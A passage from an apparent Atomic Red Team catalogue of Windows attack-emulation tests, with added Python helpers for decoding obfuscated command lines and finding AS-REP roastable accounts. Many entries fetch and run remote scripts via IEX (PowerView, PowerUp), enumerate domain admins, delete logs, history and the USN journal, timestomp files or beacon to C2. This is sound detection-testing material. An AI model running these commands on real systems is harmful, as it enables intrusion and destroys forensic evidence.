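                result["command"], result["encoded"] = decode_utf16_b64(value), True
            elif switch == "encodedarguments":
                result["arguments"] = decode_utf16_b64(value)   # CLIXML text once decoded
            else:
                result["switches"][switch] = value
            i += 2
        else:
            result["switches"][switch] = True
            i += 1
    return result


# Constructed process-creation command lines (not real telemetry)
SAMPLE_COMMAND_LINES = [
    'powershell.exe -nop -w hidden -c "Write-Host Hello, from PowerShell!"',
    "PowerShell.exe /NoP /Ec " + encode_command("Write-Host 'Hello, from PowerShell!'"),
    "powershell -encodedcom " + encode_command("Start-Process calc.exe"),
    "powershell.exe -ea " + encode_command('<Objs Version="1.1.0.1"></Objs>') + " -c -",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        r = normalize_powershell_cmdline(line)
        print(f"{r['switches']} encoded={r['encoded']} command={r['command']!r} args={r['arguments']!r}")
```

Match rules on the normalized command field rather than on the raw command line; the decoded text is what script block logging (Event ID 4104) would also show, so the same content rule can be shared between the two sources.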
T1059.001 powershell elevated windows PowerShell Invoke Known Malicious Cmdlets
PowerShell
PowerShell execution of known malicious PowerShell cmdlet names, each stubbed out with a harmless function so that only the names, not real payloads, are invoked and logged.
$malcmdlets = #{Malicious_cmdlets}
# Define a harmless stub function for each cmdlet name
foreach ($cmdlets in $malcmdlets) {
    Invoke-Expression "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
# Invoke each stub so the cmdlet names appear in script block and command line logging
foreach ($cmdlets in $malcmdlets) {
    & $cmdlets}
T1059.001 powershell windows PowerUp Invoke-AllChecks
PowerShell
Check for privilege escalation paths using PowerUp from PowerShellMafia
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
T1059.001 powershell windows Abuse Nslookup with DNS Records
PowerShell
Red teamers avoid IEX and Invoke-WebRequest in their PowerShell commands. Instead, they host a DNS TXT record carrying the payload and retrieve it with nslookup to compromise hosts. [reference](https://twitter.com/jstrosch/status/1237382986557001729)
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
T1059.001 powershell windows SOAPHound - Dump BloodHound Data
PowerShell
Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. src: https://github.com/FalconForceTeam/SOAPHound
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
T1059.001 powershell windows SOAPHound - Build Cache
PowerShell
Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. src: https://github.com/FalconForceTeam/SOAPHound
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
T1059.003 powershell windows Create and Execute Batch Script
Windows Command Shell
Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again.
Start-Process "#{script_path}"
T1059.003 command_prompt windows Writes text to a file and displays it.
Windows Command Shell
Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk.
echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
T1059.003 command_prompt windows Suspicious Execution via Windows Command Shell
Windows Command Shell
Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary.
%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
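The %LOCALAPPDATA:~-3,1% trick above works because cmd.exe expands %VAR:~start,len% substrings before the line runs, so the "c" is pulled out of "...\AppData\Local" and glued onto "md". The following Python is an added example, not Atomic Red Team code: it implements cmd's percent-expansion rules (plain references, substrings with negative offsets and lengths, and the old=new and *old=new replace forms) against a constructed environment, so an analyst can recover the real command from a logged command line. Expansion is a single pass, as on a command line; %% escaping and delayed !VAR! expansion are not modelled.

```python
"""Expand cmd.exe %VAR%, %VAR:~start,len% and %VAR:old=new% references so
obfuscated command lines can be read.

Added example, not Atomic Red Team code. SAMPLE_ENV is constructed to the
default Windows layout (LOCALAPPDATA = C:\\Users\\<user>\\AppData\\Local).
"""
import re

# %NAME%, %NAME:~start,len%, %NAME:~start%, %NAME:old=new%, %NAME:*old=new%
VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_()]*)(?::([^%]*))?%")


def _substring(value, spec):
    """spec is 'start' or 'start,len'; negative numbers count from the end."""
    parts = spec.split(",", 1)
    n = len(value)
    start = int(parts[0]) if parts[0].strip() else 0
    start = max(n + start, 0) if start < 0 else min(start, n)
    if len(parts) == 1 or not parts[1].strip():
        return value[start:]
    length = int(parts[1])
    end = start + length if length >= 0 else n + length
    return value[start:max(end, start)]


def _replace(value, spec):
    """%VAR:old=new% replaces every case-insensitive occurrence of old; a leading
    '*' on old replaces everything up to and including its first occurrence."""
    old, _, new = spec.partition("=")
    if not old:
        return value
    if old.startswith("*"):
        idx = value.lower().find(old[1:].lower())
        return value if idx < 0 else new + value[idx + len(old) - 1:]
    return re.sub(re.escape(old), lambda _m: new, value, flags=re.IGNORECASE)


def expand(cmdline, env):
    """Single-pass percent expansion of cmdline using env (names are case-insensitive)."""
    lookup = {name.upper(): val for name, val in env.items()}

    def substitute(match):
        name, spec = match.group(1).upper(), match.group(2)
        if name not in lookup:
            return match.group(0)   # undefined names stay literal on a command line
        value = lookup[name]
        if spec is None:
            return value
        if spec.startswith("~"):
            return _substring(value, spec[1:])
        return _replace(value, spec)

    return VAR_RE.sub(substitute, cmdline)


# Constructed environment (not captured from a real host)
SAMPLE_ENV = {
    "COMSPEC": r"C:\Windows\System32\cmd.exe",
    "LOCALAPPDATA": r"C:\Users\alice\AppData\Local",
    "USERNAME": "alice",
    "PUBLIC": r"C:\Users\Public",
}

if __name__ == "__main__":
    for line in (
        "%LOCALAPPDATA:~-3,1%md /c echo hi > %PUBLIC%\\out.txt & type %PUBLIC%\\out.txt",
        "%COMSPEC:~-7,3% /c echo %USERNAME:~0,1%",
        "%COMSPEC:*System32\\=%",
    ):
        print(f"{line}\n  -> {expand(line, SAMPLE_ENV)}")
```

Feed the expander the environment of the host that logged the line (the same variable values the adversary relied on); the substring offsets only resolve to the intended characters when the path layout matches.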
T1059.003 powershell windows Simulate BlackByte Ransomware Print Bombing
Windows Command Shell
This test attempts to open a file a specified number of times in Wordpad, then prints the contents. It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. See https://redcanary.com/blog/blackbyte-ransomware/.
cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null
T1059.003 command_prompt windows Command Prompt read contents from CMD file and execute
Windows Command Shell
Simulate Raspberry Robin using the command prompt's standard-input redirection (cmd /R < file) to read and execute a file via cmd.exe. See https://redcanary.com/blog/raspberry-robin/.
cmd /r cmd<"#{input_file}"
T1059.003 command_prompt elevated windows Command prompt writing script to file then executes it
Windows Command Shell
Simulate DarkGate malware's second stage by writing a VBScript to disk directly from the command prompt, then executing it. The script will execute 'whoami' then exit.
c:\windows\system32\cmd.exe /c cd /d #{script_path} & echo Set objShell = CreateObject("WScript.Shell"):Set objExec = objShell.Exec("whoami"):Set objExec = Nothing:Set objShell = Nothing > #{script_name}.vbs & #{script_name}.vbs
T1059.005 powershell windows Visual Basic script execution to gather local computer information
Visual Basic
Visual Basic execution test, execute vbscript via PowerShell. When successful, system information will be written to $env:TEMP\T1059.005.out.txt.
cscript "#{vbscript}" > $env:TEMP\T1059.005.out.txt
T1059.005 powershell windows Encoded VBS code execution
Visual Basic
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution a message box will pop up displaying "ART T1059.005". Note: because this module uses "ScriptControl", a 64-bit version of Microsoft Office is required. You can validate this by opening WinWord - File - Account - About Word.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
T1059.005 powershell windows Extract Memory via VBA
Visual Basic
This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
T1059.007 command_prompt windows JScript execution to gather local computer information via cscript
JavaScript
JScript execution test, execute JScript via cscript command. When successful, system information will be written to $env:TEMP\T1059.007.out.txt
cscript "#{jscript}" > %tmp%\T1059.007.out.txt
T1059.007 command_prompt windows JScript execution to gather local computer information via wscript
JavaScript
JScript execution test, execute JScript via wscript command. When successful, system information will be shown with four message boxes.
wscript "#{jscript}"
T1059.010 powershell windows AutoHotKey script execution
AutoHotKey & AutoIT
An adversary may attempt to execute a malicious script using AutoHotKey instead of a conventional interpreter such as PowerShell or cmd. A message box will be displayed and Calculator will pop up when the script is executed successfully.
Start-Process -FilePath "#{autohotkey_path}" -ArgumentList "#{script_path}"
T1069.001 command_prompt windows Basic Permission Groups Discovery Windows (Local)
Local Groups
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, the local groups and the members of the local Administrators group will be displayed.
net localgroup
net localgroup "Administrators"
T1069.001 powershell windows Permission Groups Discovery PowerShell (Local)
Local Groups
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, the local groups and the members of the local Administrators group will be displayed.
get-localgroup
Get-LocalGroupMember -Name "Administrators"
T1069.001 powershell windows SharpHound3 - LocalAdmin
Local Groups
This module runs the Windows executable of SharpHound in order to remotely list members of the local Administrators group (SAMR)
New-Item -Path "#{output_path}" -ItemType Directory > $null
& "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}"
T1069.001 command_prompt windows Wmic Group Discovery
Local Groups
Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system.
wmic group get name
T1069.001 powershell windows WMIObject Group Discovery
Local Groups
Utilizing the PowerShell cmdlet Get-WMIObject to enumerate local groups on the endpoint. Upon execution, information about the local groups on the system will be displayed.
Get-WMIObject Win32_Group
T1069.002 command_prompt windows Basic Permission Groups Discovery Windows (Domain)
Domain Groups
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
net localgroup
net group /domain
net group "enterprise admins" /domain
net group "domain admins" /domain
T1069.002 powershell windows Permission Groups Discovery PowerShell (Domain)
Domain Groups
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
get-ADPrincipalGroupMembership #{user} | select name
T1069.002 command_prompt windows Elevated group enumeration using net group (Domain)
Domain Groups
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
net groups "Account Operators" /domain
net groups "Exchange Organization Management" /domain
net group "BUILTIN\Backup Operators" /domain
net group "Domain Admins" /domain
T1069.002 powershell windows Find machines where user has local admin access (PowerView)
Domain Groups
Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
T1069.002 powershell windows Find local admins on all machines in domain (PowerView)
Domain Groups
Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose
T1069.002 powershell windows Find Local Admins via Group Policy (PowerView)
Domain Groups
Takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose
T1069.002 powershell windows Enumerate Users Not Requiring Pre Auth (ASRepRoast)
Domain Groups
When successful, accounts that do not require kerberos pre-auth will be returned
get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
T1069.002 command_prompt windows Adfind - Query Active Directory Groups
Domain Groups
AdFind can be used for reconnaissance in an Active Directory environment. This example, enumerating Active Directory groups, has been documented in ransomware actor intrusions. References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=group) #{optional_args}
T1069.002 powershell windows Enumerate Active Directory Groups with Get-AdGroup
Domain Groups
The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory. Upon successful execution a listing of groups will output with their paths in AD. Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
Get-AdGroup -Filter *
T1069.002 powershell windows Enumerate Active Directory Groups with ADSISearcher
Domain Groups
The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory. Upon successful execution a listing of groups will output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
T1069.002 powershell windows Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
Domain Groups
When successful, accounts that do not require kerberos pre-auth will be returned. Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
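Both AS-REP roasting tests above (the DoesNotRequirePreAuth property and the -band 4194304 filter) reduce to one bit in userAccountControl: 0x400000, DONT_REQ_PREAUTH. The following Python is an added example, not Atomic Red Team code: it decodes userAccountControl into its documented ADS_USER_FLAG names, selects the accounts that are roastable in practice (pre-auth not required and not disabled, since the KDC refuses an AS-REP to a disabled principal), and builds the equivalent raw LDAP filter using the LDAP_MATCHING_RULE_BIT_AND rule, which is what the Get-ADUser -band filter translates to. The account records are constructed.

```python
"""Decode userAccountControl and find AS-REP roastable accounts.

Added example, not Atomic Red Team code. Flag values are the documented
ADS_USER_FLAG_ENUM bits; the account records below are constructed.
"""

UAC_FLAGS = {
    "SCRIPT": 0x0001,
    "ACCOUNTDISABLE": 0x0002,
    "HOMEDIR_REQUIRED": 0x0008,
    "LOCKOUT": 0x0010,
    "PASSWD_NOTREQD": 0x0020,
    "PASSWD_CANT_CHANGE": 0x0040,
    "ENCRYPTED_TEXT_PWD_ALLOWED": 0x0080,
    "TEMP_DUPLICATE_ACCOUNT": 0x0100,
    "NORMAL_ACCOUNT": 0x0200,
    "INTERDOMAIN_TRUST_ACCOUNT": 0x0800,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "MNS_LOGON_ACCOUNT": 0x20000,
    "SMARTCARD_REQUIRED": 0x40000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "NOT_DELEGATED": 0x100000,
    "USE_DES_KEY_ONLY": 0x200000,
    "DONT_REQ_PREAUTH": 0x400000,   # 4194304 decimal: the bit both tests filter on
    "PASSWORD_EXPIRED": 0x800000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,
    "PARTIAL_SECRETS_ACCOUNT": 0x4000000,
}
DONT_REQ_PREAUTH = UAC_FLAGS["DONT_REQ_PREAUTH"]
ACCOUNTDISABLE = UAC_FLAGS["ACCOUNTDISABLE"]
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(value):
    """Names of the flags set in a userAccountControl value, in bit order."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def asrep_ldap_filter(include_disabled=False):
    """Raw LDAP filter equivalent to the Get-ADUser -band 4194304 query."""
    base = ("(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={DONT_REQ_PREAUTH})")
    if include_disabled:
        return f"(&{base})"
    return f"(&{base}(!(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={ACCOUNTDISABLE})))"


def asrep_roastable(accounts, include_disabled=False):
    """sAMAccountNames with the pre-auth bit set; disabled accounts are skipped by
    default because the KDC returns KDC_ERR_CLIENT_REVOKED instead of an AS-REP."""
    hits = []
    for acct in accounts:
        uac = acct["userAccountControl"]
        if not uac & DONT_REQ_PREAUTH:
            continue
        if uac & ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(acct["sAMAccountName"])
    return hits


# Constructed directory export (not from a real domain)
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "jdoe",       "userAccountControl": 0x10200},   # normal, password never expires
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x400200},  # normal + DONT_REQ_PREAUTH
    {"sAMAccountName": "old_svc",    "userAccountControl": 0x400202},  # same, but disabled
    {"sAMAccountName": "WS01$",      "userAccountControl": 0x1000},    # workstation trust account
]

if __name__ == "__main__":
    print(asrep_ldap_filter())
    for acct in SAMPLE_ACCOUNTS:
        print(acct["sAMAccountName"], decode_uac(acct["userAccountControl"]))
    print("roastable:", asrep_roastable(SAMPLE_ACCOUNTS))
```

The same filter string can be pasted into ldifde or ADSISearcher when the ActiveDirectory module is not installed on the host, and the decoded flag names make it obvious when a hit is a disabled or machine account that no longer matters.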
T1069.002 powershell windows Get-DomainGroupMember with PowerView
Domain Groups
Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
T1069.002 powershell windows Get-DomainGroup with PowerView
Domain Groups
Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
T1069.002 command_prompt elevated windows Active Directory Enumeration with LDIFDE
Domain Groups
Output information from Active Directory to a specified file. [Ldifde](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731033(v=ws.11)) is a CLI tool for creating, modifying and deleting directory objects. The test is derived from the CISA report on Volt Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
ldifde.exe -f #{output_path}\#{output_file} -p subtree
T1070 command_prompt elevated windows Indicator Removal using FSUtil
Indicator Removal
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn
fsutil usn deletejournal /D C:
T1070 powershell windows Indicator Manipulation using FSUtil
Indicator Removal
Finds a file by user name (if Disk Quotas are enabled), queries allocated ranges for a file, sets a file's short name, sets a file's valid data length, sets zero data for a file, or creates a new file. Upon execution, no output will be displayed. More information about fsutil can be found at https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-file - https://tria.ge/230601-x8x6bsgb24/behavioral2
if (-not (Test-Path "#{file_to_manipulate}")) { New-Item "#{file_to_manipulate}" -Force } 
echo "1234567890" > "#{file_to_manipulate}"
fsutil file setZeroData offset=0 length=#{file_data_length} "#{file_to_manipulate}"
T1070.003 powershell windows Prevent Powershell History Logging
Clear Command History
Prevents PSReadLine from saving PowerShell command history for the current session.
Set-PSReadlineOption -HistorySaveStyle SaveNothing
T1070.003 powershell windows Clear Powershell History by Deleting History File
Clear Command History
Clears PowerShell history by deleting the PSReadLine history file.
Remove-Item (Get-PSReadlineOption).HistorySavePath
T1070.003 powershell windows Set Custom AddToHistoryHandler to Avoid History File Logging
Clear Command History
The "AddToHistoryHandler" receives the current command as the $line variable and then returns $true if the line should be written to the history file. Here we simply return $false so nothing gets added to the history file for the current session.
Set-PSReadLineOption -AddToHistoryHandler { return $false }
T1070.003 powershell windows Clear PowerShell Session History
Clear Command History
This technique involves using the Clear-History cmdlet in PowerShell to remove all records of previously executed commands. This action is often performed by attackers to eliminate traces of their activities, making incident detection and forensic investigation more challenging. By clearing the session history, adversaries aim to obfuscate their operational footprint.
Clear-History
T1070.004 command_prompt windows Delete a single file - Windows cmd
File Deletion
Delete a single file from the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
del /f #{file_to_delete}
T1070.004 command_prompt windows Delete an entire folder - Windows cmd
File Deletion
Recursively delete a folder in the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
rmdir /s /q #{folder_to_delete}
T1070.004 powershell windows Delete a single file - Windows PowerShell
File Deletion
Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
Remove-Item -path #{file_to_delete}
T1070.004 powershell windows Delete an entire folder - Windows PowerShell
File Deletion
Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
Remove-Item -Path #{folder_to_delete} -Recurse
T1070.004 powershell elevated windows Delete Prefetch File
File Deletion
Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count before and after the test to verify that the number of prefetch files decreases by 1.
Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
T1070.004 powershell windows Delete TeamViewer Log Files
File Deletion
Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ratio. This test just places the files in a non-TeamViewer folder; a detection would just check for a deletion event matching the TeamViewer log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. https://twitter.com/SBousseaden/status/1197524463304290305?s=20
New-Item -Path #{teamviewer_log_file} -Force | Out-Null
Remove-Item #{teamviewer_log_file} -Force -ErrorAction Ignore
T1070.004 command_prompt elevated windows Clears Recycle bin via rd
File Deletion
An adversary clears the recycle bin in the system partition using rd to remove traces of deleted files. [Reference](https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/)
rd /s /q %systemdrive%\$RECYCLE.BIN
T1070.005 command_prompt windows Add Network Share
Network Share Connection Removal
Add a Network Share utilizing the command_prompt
net use c: #{share_name}
net share test=#{share_name} /REMARK:"test share" /CACHE:No
T1070.005 command_prompt windows Remove Network Share
Network Share Connection Removal
Removes a Network Share utilizing the command_prompt
net share #{share_name} /delete
T1070.005 powershell windows Remove Network Share PowerShell
Network Share Connection Removal
Removes a Network Share utilizing PowerShell
Remove-SmbShare -Name #{share_name}
Remove-FileShare -Name #{share_name}
T1070.005 command_prompt elevated windows Disable Administrative Share Creation at Startup
Network Share Connection Removal
Administrative shares are hidden network shares created by Microsoft’s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. These shares are automatically created at startup unless they have been purposefully disabled, as is done in this Atomic test. As Microsoft puts it, "Missing administrative shares typically indicate that the computer in question has been compromised by malicious software." https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f
T1070.005 command_prompt elevated windows Remove Administrative Shares
Network Share Connection Removal
Administrative shares are hidden network shares created by Microsoft’s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. As Microsoft puts it, “Missing administrative shares typically indicate that the computer in question has been compromised by malicious software.” https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/
for %i in (C$ IPC$ ADMIN$) do net share %i /delete
T1070.006 powershell windows Windows - Modify file creation timestamp with PowerShell
Timestomp
Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
Get-ChildItem "#{file_path}" | % { $_.CreationTime = "#{target_date_time}" }
T1070.006 powershell windows Windows - Modify file last modified timestamp with PowerShell
Timestomp
Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
Get-ChildItem "#{file_path}" | % { $_.LastWriteTime = "#{target_date_time}" }
T1070.006 powershell windows Windows - Modify file last access timestamp with PowerShell
Timestomp
Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
Get-ChildItem "#{file_path}" | % { $_.LastAccessTime = "#{target_date_time}" }
T1070.006 powershell windows Windows - Timestomp a File
Timestomp
Timestomp kxwn.lock. Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. [Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)
import-module "#{file_path}\timestomp.ps1"
timestomp -dest "#{file_path}\kxwn.lock"
T1070.006 powershell elevated windows Event Log Manipulations- Time slipping via Powershell
Timestomp
Changes the system time on the computer to a time that you specify. It involves altering the system’s clock or adjusting the dates of files, affecting timestamp integrity within Event Logs. This technique can disrupt the sequence of logged events, complicating incident analysis and forensics. Reference - https://detect.fyi/event-log-manipulations-1-time-slipping-55bf95631c40 https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/set-date?view=powershell-7.4
try {
  Set-Date -Date (Get-Date).AddDays(#{days_to_modify})
  Add-Content "$env:APPDATA\slipDays.bak" #{days_to_modify}
}
catch {exit 1}
T1070.008 powershell elevated windows Copy and Delete Mailbox Data on Windows
Clear Mailbox Data
Copies and deletes mail data on Windows
New-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -ItemType Directory -ErrorAction Ignore
Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data" -Exclude copy | ForEach-Object { Copy-Item -Path $_.FullName -Destination "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore }
Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore
T1070.008 powershell elevated windows Copy and Modify Mailbox Data on Windows
Clear Mailbox Data
Copies and modifies mail data on Windows
New-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -ItemType Directory -ErrorAction Ignore
Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data" -Exclude copy | ForEach-Object { Copy-Item -Path $_.FullName -Destination "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore }
Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -File | ForEach-Object { Add-Content -Path $_.FullName -Value "Modification for Atomic Red Test" -ErrorAction Ignore }
T1071 powershell windows Telnet C2
Application Layer Protocol
An adversary may establish Telnet communication from a compromised endpoint to a command and control (C2) server in order to carry out additional attacks on objectives.
#{client_path} #{server_ip} --port #{server_port}
T1071.001 powershell windows Malicious User Agents - Powershell
Web Protocols
This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
